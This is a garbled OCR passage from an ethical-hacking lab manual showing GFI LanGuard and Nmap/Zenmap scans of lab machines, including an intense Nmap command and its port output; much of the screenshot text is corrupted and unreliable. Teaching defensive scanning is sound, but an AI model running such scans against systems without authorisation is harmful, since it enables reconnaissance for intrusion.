M anage A g e n ts Enable agents to automate netooric secant? audit and totfstribute scanning load across client machines

L a u n c h a S can Manually set-up andtnuser an aoerSess neVrxt seajrit/ audrt. LATES1 NLWS V# ?4-A*j-7017 -Patch MmuxirTimri -N n pi txkul a fy n le d ID I -XI }u n jp \fe»g 1! Ttft ■ m u lar ‫ ־‬l w mr‫»־‬ 1 ( 74 A q 701? Patch Mfwtgnnnnl Added DCport for APS81? IS. Mohr. Arrvhm !) 5 2 Pro nnd Standivd

I

1 ‫־‬

tr.v i•n-

V*, 24-AJO-2012 -Patch M4uu«m< -Aiktod kuxkI 1 0 1APS812-1S. Mobm A uob* 10.1.4 Pro mtd St—a-0 - -M j ut

FIG U R E5 .3 :T heG FIL A N guardm amw indow
m C ustomscans are recom m ended: ■W henperform inga onetim e scanw ith particular scanning param eters/profiles ■W henperform ingascan for particular netw ork threats and/or system inform ation ■ Toperformatarget com puter scanusinga specific scanprofile

4. Click die L a u n c h
> I «‫ ־‬I
Doshboerd Scan

a Scan
Remediate

option to perform a network scan.
GFI LanGuard 2012 AdMty Monitor Reports Configuration Ut*oes «t Di»e1«s thb version

W elcome to GFI LanG uard 2012
GFI LanGuard 2012 &ready to audit your network k* *AmafrMws

1

Local Computer Vulnerublllty Level use ‫־‬ van a;# Agents‫־‬or Launch a scan‫ ־‬options 10 auoa the entire network.

JP

V ie w D a s h b o a rd Investigate network!wjineraMit, status andauairesults

9
t - ‫יז‬.‫&־‬ ^-‫־־־‬ iim jIM : Cunent Vulnerability Luvul is; High

R e m e diate S e cu rity Issu e s Deploy missing patches unirwta■urau*>0rf2e430**are. turn on antivirus ana m ore.

%

M anage A g e n ts Enable agents to automate neteror* secant* aud* and totfstnbute scanning load across client machines

L a u n c h a Scan Manually * < rtu p andtnwer anagerttest network»taint/ autirl LAI LSI NLWS <j ?4-Ajq-TOI? - fa it h M<au»)«nenl - N r . pnxkjrf !^ported POF-XLhan^r Mena 2 ‫ ל‬TOb

m e u la -

IW 3 1 » ‫־‬ « ‫־‬ -

V* 24A jq2012

Patch MnnnQcjncnr Added support forAPS812-16. Adobe Acrobat 9 5 2 Pro and Standard

24-Aju-2012 -Patch Md11r f u t ! « 1t*t -Added support t o rAPS812-16. Adobe Acrobat 10.1.4 Pro and Stand c f f d - F=ad ‫■»־‬

^ If intrusiondetection softw are (ID S) is running duringscans, G FI LA N guard sets off a m ultitude of ID Sw arnings andintrusionalerts inthese applications.

FIG U R E5 .4 :T heG FIL A N guardm ainw indowindicatingtheL aunchaC ustomS canoption 5.
Launch a N ew sca n

window will appear from die drop-down list from die

i. ii. iii.

1 1 1 die Scan Target option, select lo c a lh o s t from die drop-down list 1 1 1 die Profile option, select F u ll 1 1 1 die Credentials option, select drop-down list
Scan

c u rre n tly lo g g ed on u s e r

6. Click S c a n .
C E H Lab M anual Page 115 E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

GF! LanGuard 2012

’‫ ן ־‬° r x ‫־‬
C o n f!g u ra U o n Jt Urn C J, Uiscuuttm1

• > l«- I
ta u a d ia tn e S a n

D a s h b o a rd

S ca n

Ranrdijle
P10•*: jf-J S^n

A ctiv.tyM o n ito r

R e p o rts

Scar‫־‬a02‫׳‬t: b a te : Ot0en:‫־‬fck»/T«rt(r ockcCon uso‫־‬ Scar Qaccre... Son ■ n d ti Ovrrvlew

v M V

v * ?axrrard: IIZ * 1 1 ‫״‬

SOM R ru lti Dcta ll<

m For largenetw ork environm ents, aM icrosoft SQ LServer/M SD E database backendis recom m endedinsteadof theM icrosoft A ccess database.

FIG U R E5 .5 :S electin ganoptionfornetw orkscanning
7.

Scanning will s ta rt; it will take some time to scan die network. See die following figure

m Q uickscans have relativelyshort scan durationtim es com paredto full scans, m ainlybecause quickscans perform vulnerabilitychecks of only asubset of the entire database. It is recom m endedto runa quickscanat least once a w eek.

8. After completing die scan, die s c a n

re s u lt

will show in die left panel

C E H Lab M anual Page 116

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

&

yI

I

D a s h b o a id

S ca n

R e m cd u te

GFI Lar> G uard2012 A ctw ty M o n ito r R e p o rts C o n fig u ra tio n

,‫ ־‬I□ ‫־‬x L ttr fr tm

ta u K k a lm k in

ScanTarget ccaftoct

K a te :
V ... | FalSar jsandffc: V Eaaswofd:

H II
Scan R r a k i Details

C j-rr& tbcaed on iser
Scan R r u ik i ovrrvm n

4 Scan target: locatbo»t - y) 52 10 0 0 7 IWDI-039MR5II19C4] (WhkJ vws .

*

S ca n c o m p le te d !
Summ ary 8f *ear resufs 9eneraf0fl <Jut>51

m

T ypes of scans: Scana singlecom puter: Select this optionto scanalocal host or one specificcom puter. Scanarange of com puters: Select this optionto scananum ber of com puters defined throughanIPrange. Scanalist of com puters: Select this optionto im port alist of targets fromafileor to select targets fromanetw ork list. Scancom puters intest file: Select this optionto scantargets enum erated inaspecific text file. Scanadom ain or w orkgroup: Select this optionto scanall targets connectedto adom ain or w orkgroup.

V u ln e ra b ility le v e l: The average vulnerabilty le.ei lor ttus sea‫־‬nr s 1

Results statistics:
Audit operations processed; 1>703 aw*! operations processed

Missing scftwaie updates:
Other vulnerabilities:

20 <20 C ‫ ׳‬tcai‫׳‬Hgr> 1313 Crecol'-.qh)
3

Potential vulnerabilities:
Scanner ActMty Wkxkm ‫*ו^יז‬ W fa :ili« !* W CanptJer VJUH> ra W J t« !a i K t - n •can Citar n» 1 1 ‫ ״‬t41:ate 101 r r s q v

• wunr is*lvatd or not found

i
----------12- 1

FIG U R E5 .7 :T heG FIL anG uardC ustomscanw izard 9. To check die Scan Result Overview, click IP right panel 10. It shows die V u ln e ra b ility A s s e s s m e n t click V u ln e ra b ility A s s e s s m e n t
ad d ress

of die machiiiein die

an d N e tw o rk & S o ftw a re A udit:

Eocafost

GFI LanGuard 2012 J |^ | Daihboard Sean R nrw U r AdMyMorilor Reports Configuration UtMws
W, Dis c u m tvs vtssaan

Q i3 3 iT ~ .it..
Cj‫־‬end, bcaec

PceSe v j. . . | |F‫״‬IS1‫״־‬

* ‫*ו‬ ?a££‫׳‬.C rd:

o n u s e r

Userrvaae:

II
1Results Details

J

•••

1 ___^

____

1

#

V a n t n r y t : lornlhost

| - 1000
« ,

‫ר־‬V |WIW l)J9MIC>Mt9L4l (Window.
< 1>rrafcj1 ty W ^ n r r n t |

J] j

|

‫[ ׳‬W»UJ39MRSHL9f4| (Windows Server ?01? 164)

‫־‬ •

n N et-w ar* & Softwire Audit Vulnerability level:
T ► • * corrvwar dues not have a Vuhe'aHty te.el •VII. * :

Y/lttt dim

irean?

Po s s ib le reaso n s:

3‫ ־‬The credentials used 10 scan this confute‫ ׳‬0 ‫ ג‬not »1: * 9 * «cnty ecamer 10 retrieve an required tafomwtion 10• escmatra we Vjheraoity Level An account wth s M i r r a , • :rvjeges or rne target computer B requrM * Certan securty srttnqs on the remote conpuler Dtoct r * access 0 ( Ite security scanner. Betam s a fa rt of most

t. Th• •can b not Inched yet 2.O sC ectbn of m issing paiches and vane‫ ׳‬abiEe* 8

s m U ta* ‫» »ליינ‬ca1‫׳‬nir aerode used to performthe scan.

Scaruicr ActMty Window

flteetlKMQL

l l i r v ^ dl( k l h • )

u. . ‫״‬M

• ' ■ < V> I I c — tfiiS ldriI ftwwl
I

FIG U R E5 .8 :S electin gV ulnerabilityA ssessm ent option

C E H Lab M anual Page 117

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

11. It shows all the V u ln e r a b ilit y
V

A ssessm en t
Reports

indicators by category
‫־־‬T ^ P
x

GFI LanGuard 2012 d > «‫־‬
Dashboard Scan Rernediate Activity Men!tor Configuration UUkbes
W,

‫־‬

GFI L A N guard scans target com puters to retrieve setupinform ationand identifyall security vulnerabilities including: ■M issingM icrosoft updates ■ Systemsoftw are inform ation, including unauthori2ed applications, incorrect antivirus settings and outdatedsignatures ■ Systemhardw are inform ation, including connectedm odem s and U S Bdevices

/ 7D uringa full scan,

L

Di 8cub 8 •»a v«a«on._

l a — d i a Merc Scan

Bar Target; v | | .. . c/fomess [am r#y iC Q jjetf onuser

»roS»: H i scarJgynang:

3 $
Password: 5

V1

or

Scmi Rr»ulU Ov*rvt*%»
<0 $ u a U r « « t : l1 ) u lm l

Sc4nR*M1ft>0«UNk V u ln e ra b ility A sse ssm e n t
s«tea ene of the folowno wjfcerabilry 01*99'** ‫ייה»*ל‬

f S I S ItM J(m R-K M M U H U M ](W M tom .
• Yuhefablty Assessment

A ‫ * *־י‬security wirerablofa (3)
J l MeCtomSearity Vuherabirtes (6) j , low Searity Viinerablitfes (4J PofanBd Vuherabltea (3)

4
t

*qn security Vumeratxaties (3) Xbu you toanalyze the ‫־ ״‬security vjre tb i'.a

10

A

Meshc service Packs and U3cate =&u>s (1}

^ . .

# Msarvs Security Updates (3)

■ Jedium Security VulneraNKies )6 ( ,‫ וגי‬toanajy7e thsrredun !earitytfjrerabises Low Security Vulnerabilities 1 4 ( ycu to a‫ ׳‬iy» thelc« 9eculty

- _* Hee*ak & Software Ault

^

1 5

Potential vulnerabilities )1( Xb>.s you to a-elvre tiie inform ationsecurity aJ‫־־‬o Ufesing S vtca P acks and Updala RolHipc (1) U>»3vcutoane(yK thcrm eiroiervm pK tsnV m evn

« 1

thread I (Idle) |Scan Pvead 7 (•is' I 5 u n t1 « : 3 O tfic] Bras

FIG U R E5 .9 :L ist ofV ulnerabilityA ssessm entcateg o ries 12. Click N e tw o rk
P a tc h in g

in die right panel, and then click S y s te m S t a t u s , which shows all die system patching statuses
& S o ftw a re A u d it
C r i L in O u a rd 2012

1 - ‫״‬r ‫ ״‬1
Configuration JM M et <U) ' D iic in t llm vm*an

to■ >
Scar ’ • o e ‫־‬ -

•4 -

1

Dashboard

Sran

Re‫*»״‬Aate

Activity Monitor

Rrpoits

la u a d ia New Sean

Ho ft*.
- 11 '‫־״‬ ^ v |• P315/.ord: Sari

O afattab: |0 rrentf> o g c « or u er ‫ ־‬1

Jse n re ;

SCM R « M b Overview 9 Scan ta rve t iocalhost m

1Rem its Detais

- 3 1 8 I M A / [W » 0 3 9 N R S W « 4 ] ( I M l t K -

System Patching Status
Select one of tte Mtahg systemwtchro M U
Minting Service P acks ■ • nit llpduir Rciaup* )1( AI3v»1 you to andyM f*r rrs «‫־‬K! server parW r>f»—j i w

Duetothelarge am ount ofinform ation retnevedfromscanned targets, full scans often tendto belengthy. It is recom m endedtorunafull scanat least onceevery2 w eeks.

** e h S e c v lt yV 1 * 1e r a M it t e t( 3 ) X rvfcdun Security VUrtrabilBe• (6) X * J n a r a M t ) • • (‫ג‬ ) t S e r v ic e P n r i n m i1t3datr Roittn (1) f •1su1sSeu1UyUl>0at«*(3) I ‫\״‬ f t o a r y .a ^ f t r a a r c r u O tI
X ‫ יי»־‬Sec“ ' >ty\\1h»ab4U»» (4)

S -4 (U‫!־‬f(hilY to n T e il

)Mk Missing Security Updates (, J
■ Alotwt Mu U nWy.'t u!« mistfio mcuICv update I

'0

- Jb j

m Missing Non-Security Updates )16(
Alan* you to analyie the rwn-security ipaaws rfamssen

S %
U A

Ports
rtor&Atrc

J%

*»- f i Software a system mibnnaaon

1 2 J %!astaaed Non-SecurityUpdates )1(

staled Security Updates )2( Aq t> syou‫■־ ט‬ nay c tJic knitaifedsecurity!edatehfanala Alo‫״י‬you to analyze thenstslicd nor-securty5 X g

Scanner A ctm ty Wmdow

Starting security scan of host \VIM.I)MMRSMl«4[100.0 T \
!■nr: I M k U PM

: ry Scan thread 1(idle) S a tllia i IM t ' . !

10

:‫ י‬t «. 3

FIG U R E5 .1 0 :S ystempatchingstatusreport 13. Click P o rts, and under diis, click O p en
T C P P o rts

C E H Lab M anual Page 118

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

m Acustomscanis a netw orkaudit basedon param eters, w hichyou configure onthe flybefore launchingthe scanning process. V anous param eters canbe custom izedduringthis type of scan, including: ■T ypeof scanningprofile (L e., the typeof checks to execute/type ofdata toretrieve) ■ Scantargets ■ Logoncredentials

&
jbcahoK

• > l«- I

S ca n

Rancdijlr

GF! LanGuard 2 0 1 2 £ *!1 vty M o n ito r R e p o rts C o rrfig u ra

1- 1■■ C J, Uiscuu tin s1

V I ... I |MSw1 Uenvaae: S asG w ord:

‫•ויי‬

Oc0en‫־‬ .dfe. |0xt«rtK ocKcCon us® ‫־‬

II ^9

1 ___ * = ____ 1 0

9 sr.Mi f .‫׳ר‬get‫ ־‬torn lho\t
‫־‬ • R : ; 10.0.0.7 |WIN-D39MR5H19C4| (W m d v n _ • viAwjBM y **OMtwrnt

J l ‫)*־‬h Sacuity »\jh*r<t14t*» (!)
^ X ^ # M«Jum Sttuity VllnefdMIUe( « } Law Seeunty VUnerabttiei (4} POCWlOai Viiic'attittet (3) MsangSecuity Updates (3)

• ft) so iDf*crpno‫״‬: Mytxrtrrt trerwfrr Protocol {^‫> ליודז‬ sr-wr: http (kt/ er r « t Tfonjfcr rvotocoOI 5 ‫( כג‬Cwucto- D CC w»i1u‫ ״‬l ‫«׳‬sOl)0«‫־‬ £ 1 ►**CTt*0‫׳‬V HMKCR 5M»1‫ ׳‬S*rM» S*‫׳‬VCT r « » ‫״‬n] ^ 44J Pfiapton: MooioftOS k tt * Omlav, VNntfcM *V a n Lrtnamn] B £ !027 piM otOor: !r#l»1fo, 1( tM &*e‫ ׳‬v<e h no* t1 ‫»׳‬Urt(d :*•>*« &• Croj^r: Ctandwone, Ditdflpy *rd others / Sev»C s ^ t-.H |Deunpecr: LSASS, If Iha » m « is not ratafc* ratfc ;< ■» o w : Ctotafipy Network x, Oath a owers / Ser

f)

!

b e -* a e

f im it w : c a J O

m 3

# Moang Service Pocks 0‫״‬d tp d str lo tto s CO B *•ernoHc 8 1Software Audit *. ( ( System Patchrg Status

- 9 « £ 9 ^

::- 2 |C«SObacn: M e Protect. MSrtQ, t ‫״‬te 1V . M>)eic ‫־‬-» -‫י‬- » * c ro( IrsUltod D*m«r* could ttt trojan: BLA trojan . Se 4 ‫׳‬

l2^l|t«croor:N fss1i5Jcar1ty5canr*rr/servct:1r*n0M ^ 1433 [CesccCcr: Microsoft SQL Server database r a ‫־‬ a jr w :

s r t s c n Server /S«‫־‬ > ic*: LTknown]

]‫־‬333 I . S e e n H P P a r aW|
•V Coen LC» Ports (5)

I
II

A Hardware
.if Software

System [nfbmodon

a — er ActKRy

YVlndvw

*' f..<»t‫»*׳‬ceve‫ ׳‬y v a n thread 1 (tdlr)

S o ‫ ״‬nr rad ‫) י‬dp ( | 5 0 ‫ ־‬r *‫׳‬. vl ! ;<*)

error•

FIG U R E5 .1 1 :TCP/U D PPortsresult 14. Click S y s t e m In fo rm atio n in die light side panel; it shows all die details of die system information 15. Click P a s s w o r d
E B > 1 4 -1 Dathboaid launch a Mewsean ScarTarget ocaKx: &ederate: Z~M~CTt, bcced on toe‫־‬ Scaf 0 0 ‫^כפ‬.-. Scan R rta tf Overview
% Sf A open IX P Ports (5) r1ard*«e

P o lic y
GH LanGuard 2012

r‫־־‬° n n
Corriiguratioo Ualiwt W . 1)1*1 lew •«« vnun

Scan

fn m ijlr

Act*«y Monitor

Reports

P0.‫־‬ « t: v |... I (‫׳‬SjIScan ?aaiwd: V

3

1 U1J
0

1 __

Scan le a k ! Detalie

*50 ‫־ ׳‬1‫־‬fr»ane

|

Systsn Infer‫׳‬T M h arj
a 9ki\‫׳‬. W |l HW.\fxC. !■ ■ > > • > 1

L_J The next jobafter a netw orksecurityscanis to identifyw hichareas and system srequireyour im m ediateattention. D o this byanalyzingand correctlyinterpretingthe inform ationcollectedand generatedduringanetw ork securityscan.

,

J *‫!־*׳‬run poaaw d length: chars J **‫״!־‬unoaa'w ordsgeiodays J >Mgw rfl mtary: n o h ttay
J Vaxnuri EMSSiwrd age: 42days J ! f a s « p f f r m ‫ ׳‬force 0

• S«r.c1ll> Audit Policy (OtO
Wf Re0**v ft Net&OS M ao*3) ‫) ״‬ % Computet tj| 610Lpt (28) & Users (4)

•!_ LoggedCnUsers (11)
^ Sesscre (2) % J<rvcc5 {148} ■U Processes (76)

,

Remote TOO (Tme Of Oay)

Scanner AcUv«y Window

‫ ״ ׳ ••־‬I I > « - ‫ ׳‬V 1‫״‬n thn-rtd I (Klfc•) ScantheflUC*) i f<* 41‫'׳' ! ־‬

A) I ‫'"׳י י‬ ’

FIG U R E5.12Inform ationofP assw ordP ohcy 16. Click G ro u p s: it shows all die groups present in die system

C E H Lab M anual Page 119

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

m Ahighvulnerability level is the result of vulnerabilities or m issing patches w hose average severityis categorizedas high.

*

> ‫־‬

D a s h b o a rd

Sun

ftftnca&e

GFI LanGuard 2 0 1 2 A c tm rtyM o n ito r R e p o rts C o n fig u ra tio n

‫׳‬T oU 1 9 C U B 3U lttV W ttK JR —

‫ר‬

vl W CrM e re s t [cuT€r*f eooed cn user *1

**Scan -igemane: Password:

H

■ cc':era 1R«f»*lt» Overview
% C0«nUOPPwts(5)

Sc*• RevuJU DeUik

r A Hentesrc

• . 1 Soffaart
• ^ Symrm tnk‫׳‬m»t»n

*k SN r~ W
-4* Pd«wo1‫ ) ׳‬Pdiy - i» Sxunty Ault Pokey (Off) # ‫ ־‬lUotetry f t NetflCCS Narres (3)

l* ig r o u p s( 2 a )I I W 4} Ascheduled scanis a netw orkaudit scheduledto run autom aticallyona specificdate/tim e and at a specific frequency. Scheduledscans canbe set toexecuteonce or periodically.
% S«ss»ns (2)

%

Computer

•?. -OXfC0‫ ״‬users (1 ‫)נ‬

%5 « 1 4 )8 » :* ‫ל‬ a )
Ht ®rocrase* (76)
‫ ג‬en»te too ‫ מיוחן‬Of 0»y)

( V 'te y jM‫^ויו^ו‬ ‫<׳‬ - ‫ו׳‬ • aO • a CfctrtutedCCMUser* ‫ י‬a Guests • a K>pe‫ ׳‬V •a ‫ יי‬a E5JUSRS • a r.etY>=‫<׳‬Ccnfig.rstcn ‫״‬-a ausers • a Pr‫־‬fty1r5rcc '\r~ • a PM^lSers » a RES Ehdpcut Servers •« ‫ז‬a
& *n t Log Straefcrs Adrritstrators Psrfertrsnce Log Users **?Operators PCS Manage‫»״‬ent s « vers

* tt Control AucUat* Cws abx1 ■ft * P n t t a w i * J i.s0 u « 1 » to 1 ‫׳‬ •ft 0 fcw aw #d c c m w ra •X cm

Cp‫־‬rators

W w rt* ‫ ״‬- .

S*rf« 1 l 1f 1 .nl 1 (tdl•‫ | )׳‬Scan tfve*0 ? frt*)

*r«*d S * fe ) | & u « |

FIG U R E5 .1 3 :Inform ationofG roups 17. Click die D a sh b o a rd tab: it shows all the scanned network information 1 °n ^ ‫׳‬ GFI LanGuard 2012
I Dashboardl >« 5‫ ״‬I q
Gmp

Sun

Km•*•(•

Activity Monitor

Reports

Configuration * t Pale►**

UUkbe;

‫זי‬/.‫ ־‬OitcuMlna vwawn.-

!t

f#
C emctm

•w«v

\ 'i\

1 ViAirrnhlfces

^

4

V
► aH

SdNiare

fei *J

v

(

it 6mel1n*ork
f j UKJ»-c«t: ttlh-03»M a.5rt.4£-»
‫^' ־‬ucj1!)<»w>:y10«j<1iR<x1>

E n tire N e tw o rk -1 c o m p u te r
Security Seniors

It is recom m ended to use scheduled scans: ■ Toperform periodical/regular netw orkvulnerability scans autom aticallyand usingthe sam e scanning profiles andparam eters • To tngger scans autom aticallyafter office hours andto generate alerts andautodistributionof scan resultsviaem ail ■ To autom aticallytrigger auto-rem ediation options, (e.g., A uto dow nloadanddeploy m issingupdates)
m

rS \
Most M rarane c awoJSfS V. S C 3 y ‫ ^ ׳‬L 3 6 4

wnwarn iwuw• 1 0c « X T ‫־‬ |H 1 tcrs Service Packs and U Oaxrputers VulncraWWies 1co‫״‬pot«r9
,AiirraNity Trend Owe' tme

^

‫ ז‬K-p-w! Lratra-onied Aco*c Cco‫־‬pu‫־‬crj Ault SMTUt 0 « ‫! »י ״י ד‬

o

0 coneuteis Malware Protection ...

‫ כ‬O _ I o

cj : _ j •

‫ ו‬com puters Agent Hemtn Issues 0C 0 n p u 1 8 C 8

w
Maraqe saerts *41 •»?i ■ .KTJlii...

C om pu ter V 1 4 > era b feyCBtnbulivi

: o ‫ ־‬fu t M By Gperatng System

Z j H a r s c a n . . .

Sc-= r a d rsfrar. !TfaraaLgi p .g yy

Sec :ppdy-.ai -

C ^ p m :-jr_

1

*aer*Stofcg|\>3tStafcg|

Computes S■O 0«ath■ ■ .| Compjters By rfeUai... |

o

FIG U R E5 .1 4 : scannedreportofthenetvrork
L a b A n a ly s is

Dociunent all die results, direats, and vulnerabilities discovered during die scanning and auditing process.

C E H Lab M anual Page 120

E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

Tool/U tility

Information Collected/Objectives Achieved Vulnerability Level Vulnerable Assessment System Patching Status Scan Results Details for Open TCP Ports Scan Results Details for Password Policy

GFI LanGuard 2012

Dashboard - Entire Network ■ Vulnerability Level ■ Security Sensors ■ Most Vulnerable Computers ■ Agent Status ■ Vulnerability Trend Over Time ■ Computer Vulnerability Distribution ■ Computers by Operating System

P L E A S E T A L K TO YO U R IN S T R U C T O R IF YOU H A V E Q U ES T IO N S R E L A T E D TO TH IS LAB.

Q u e s t io n s

1. Analyze how GFI LANgtiard products provide protection against a worm. 2. Evaluate under what circumstances GFI LAXguard displays a dialog during patch deployment. 3. Can you change die message displayed when GFI LANguard is performing administrative tasks? If ves, how?

Internet Connection Required □ Yes Platform Supported 0 Classroom 0 iLabs 0 No

C E H Lab M anual Page 121

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

E x p lo rin g a n d A u d itin g a N e tw o r k U s in g N m a p
N /n a p (Z e n m a p is th e o ffic ia l A ',m a p G U I) is a f ir e , o p e n s o u rc e (lic e n s e ) u t ilit y f o r n e tw o rk e x p lo ra tio n a n d s e c u rity a u d itin g .

I C O N

K E Y

L a b S c e n a r io

Valuable information Test vour knowledge
S

Web exercise Workbook review

1 1 1 die previous lab you learned to use GFI LanGuard 2012 to scan a network to find out die vulnerability level, system patching status, details for open and closed ports, vulnerable computers, etc. A11 administrator and an attacker can use die same tools to fix or exploit a system. If an attacker gets to know all die information about vulnerable computers, diey will immediately act to compromise diose systems using reconnaissance techniques. Therefore, as an administrator it is very important for you to patch diose systems after you have determined all die vulnerabilities in a network, before the attacker audits die network to gain vulnerable information. Also, as an e t h ic a l h a c k e r and n e tw o rk a d m in is tra to r for your company, your job is to carry out daily security tasks, such as n e tw o rk in v e n to ry , service upgrade s c h e d u le s , and the m o n ito rin g of host or service uptime. So, you will be guided in diis lab to use Nmap to explore and audit a network.
L a b O b j e c t iv e s

‫ט‬

Hie objective of diis lab is to help students learn and understand how to perform a network inventory, manage services and upgrades, schedule network tasks, and monitor host 01 service uptime and downtime. hi diis lab, you need to: ■ Scan TCP and UDP ports ■ Analyze host details and dieir topology ■ Determine the types of packet filters

C E H Lab M anual Page 122

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.

M o d u le 0 3 - S c a n n in g N e tw o rk s

■ Record and save all scan reports
/—j T o o ls d e m o n stra te d in th is la b a r e a v a ila b le in D:\CEHT o o ls\ C E H v 8 M o du le 0 3 S c a n n in g N e tw o rk s

■ Compare saved results for suspicious ports
L a b E n v ir o n m e n t

To perform die lab, you need: ■ Nmap located at D :\C E H -T o o ls\C EH v 8
N e tw o rk s\ S c a n n in g T o o ls\N m ap M o d u le 0 3 S c a n n in g

■ You can also download the latest version of N m a p from the link http: / / nmap.org. / ■ If you decide to download die la t e s t die lab might differ
v e r s io n ,

dien screenshots shown in

.Q Zenm apw orks on W indow s after including W indow s 7, and S erver 2003/2008.

■ A computer running W in d o w s ■
W in d o w s S e r v e r 2 0 0 8

S e rv e r 2012

as a host machine

running on a virtual machine as a guest

■ A web browser widi Internet access ■ Administrative privileges to run die Nmap tool
L a b D u r a t io n

Time: 20 Minutes
O v e r v ie w o f N e t w o r k S c a n n in g

Network addresses are scanned to determine: ■ What services
a p p lic a t io n n a m e s

and v e r s i o n s diose hosts offer

■ What operating systems (and OS versions) diey run ■ The type of p a c k e t characteristics
T AS K 1 Lab T asks
f ilt e r s / f ir e w a lls

that are in use and dozens of odier

In te n s e S c a n

Follow the wizard-driven installation steps and install Nmap (Zenmap) scanner in die host machine (W in d o w S e r v e r 2 0 1 2 ). 1. Launch the S t a r t menu by hovering die mouse cursor in the lower-left corner of the desktop

FIG U R E6 .1 :W indow sS erver2012— D esktopview
C E H Lab M anual Page 123 E th ic a l H ackin g and Counterm easures Copyright O by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

2. Click the
S t 3 f t

N m a p -Z e n m a p G U I

app to open the

Zenm ap

window
A d m in is tra to r

l _

Zenm ap fileinstalls

the following f i l e s :

Server Manager

Windows PowrShell m Control Panel

Google

Hy^-V Manager

Nmap Zenmap

■N m apC oreF iles ■N m apPath ■W inPcap4 .1.1 ■N etw orkInterface Im port ■ Zenm ap (G U I frontend) ■N eat (M odernN etcat)
■ Ndiff

S fe

*
» ■vp*v Virtual Machine..

‫וי‬

o e

w
Command Prompt *‫ח‬ Frtfo*

©
Me^sPing HTTPort iSW M U 1

CWto*

K

FIG U R E6.2W indow sS erv er2012- A pps 3. The
N m ap - Z e n m a p G U I

window appears.

!N m ap S yntax: nm ap [S canT ype(s)] [O ptions] {target specification}

Inport scan techniques, onlyone m ethodm aybeused at a tim e, except that U D P scan (‫־‬sU ) andanyone of the SC TPscantypes (‫־‬sY , -sZ ) m aybe com binedw ithany one ofthe TC P scantypes.
/

FIG U R E6 .3 :TheZ enm apm ainw indcw 4. Enter the virtual machine W in d o w s S e r v e r 2 0 0 8 IP a d d r e s s (10.0.0.4) t!1e j a r g e t: text field. You are performing a network inventory for r o J the virtual machine. 5. 1 1 1 tliis lab, die IP address would be your lab environment
6 .
1 0 .0 .0 .4 ;

it will be different from
ty p e o f

111 the
p ro file

P r o file :

text field, select, from the drop-down list, the you want to scan. 11 1 diis lab, select In t e n s e S c a n .

C E H Lab M anual Page 124

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

7. Click S c a n to start scantling the virtual machine.
Z e n m a p
Scan Target: I o o ls P ro file Help Profile: Intense scan 1 10.0.0.4| nm a p -T4 -A - v 10.0.0.4 Services icc> |

‫׳‬-‫ ׳‬° r x

C om m and: H o s t!

Nm ap O utput

Ports

f Hosts | T o po lo gy | Host Details | Scans

W hileN m ap attem pts toproduce accurateresults, keepinm indthat all ofits insights are basedon packets returned bythe target m achines or the firew allsin front ofthem

OS < Host

FIG U R E6 .4 :T heZ enm apm ainw indoww ithT arget andP rofileentered !S "The sixport states recognized byN m ap: ■O pen ■C losed ■ Filtered ■U nfiltered ■O pen| Filtered ■C losed|U nfiltered
8. Nmap scans the provided IP address with
In te n s e s c a n

and displays
‫ז ם י‬ X ‫ן‬

the

s c a n r e s u lt

below the

N m a p O u tp u t
Zenm ap

tab.
^

Scan Target:

I o o ls

E rofile

H elp

10.0.0.4 nm a p -T4 -A - v 10.C0.4

‫׳י‬

Profile:

Intense scan

Scan:

C om m and:

N n ■ap O utp ut [p o rts / Hosts | T o p o lo g ) | H o st Details | Scans OS < Host ‫׳׳‬ 10.0.0.4 S t o r t i n g Nmap C .O l ( h t t p : / / n m s p . o r g ) at 2012 0 8 24 n m ap -T4 •A ■v 10.00.4 ^ | | Details

N m ap accepts m ultiple host specifications onthe com m andline, and theydon't needto be ofthe sam etype.

NSE: Loaded 9 3 s c r i p t s f o r s c a n n in g . MSE: S c r i p t P r e - s c a n n in g . I n i t i a t i n g ARP P in g Scan a t 1 5 :3 5 S c a n n in g 1 0 . 0 . 0 . 4 [ 1 p o r t ] C o m p le te d ARP P in e S can a t 1 5 : 3 5 , 0 . 1 7 s e la p s e d h o s ts ) I n i t i a t i n g P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a C o m p le te d P a r a l l e l DNS r e s o l u t i o n o f 1 h o s t , a t 0 .5 0 s e la p s e d I n i t i a t i n g SYN S t e a l t h S can a t 1 5 :3 5 S c a n n in g 1 0 . 0 . 0 . 4 [1 0 0 0 p o r t s ] D is c o v e r e d o pe n p o r t 135!‫ ׳‬t c p on D is c o v e r e d o pe n p o r t 1 3 9 / t c p on D is c o v e r e d o pe n p o r t 4451‫ ׳‬t c p on I n c r e a s in g se n d d e la y f o r 1 6 . 0 . 0 . 4 f r o « 0 t o ‫צ‬ o u t o f 179 d ro p p e d p ro b e s s in c e l a s t in c r e a s e . D is c o v e r e d o pe n p o r t 4 9 1 5 2 / t c p o n 1 0 . 0 . 6 . 4 D is c o v e r e d o p e n p o r t 4 9 1 5 4 / t c p o n 1 0 . 0 . 6 . 4 D is c o v e r e d o pe n p o r t 4 9 1 5 3 / t c p o n 1 0 . 0 . 6 . 4 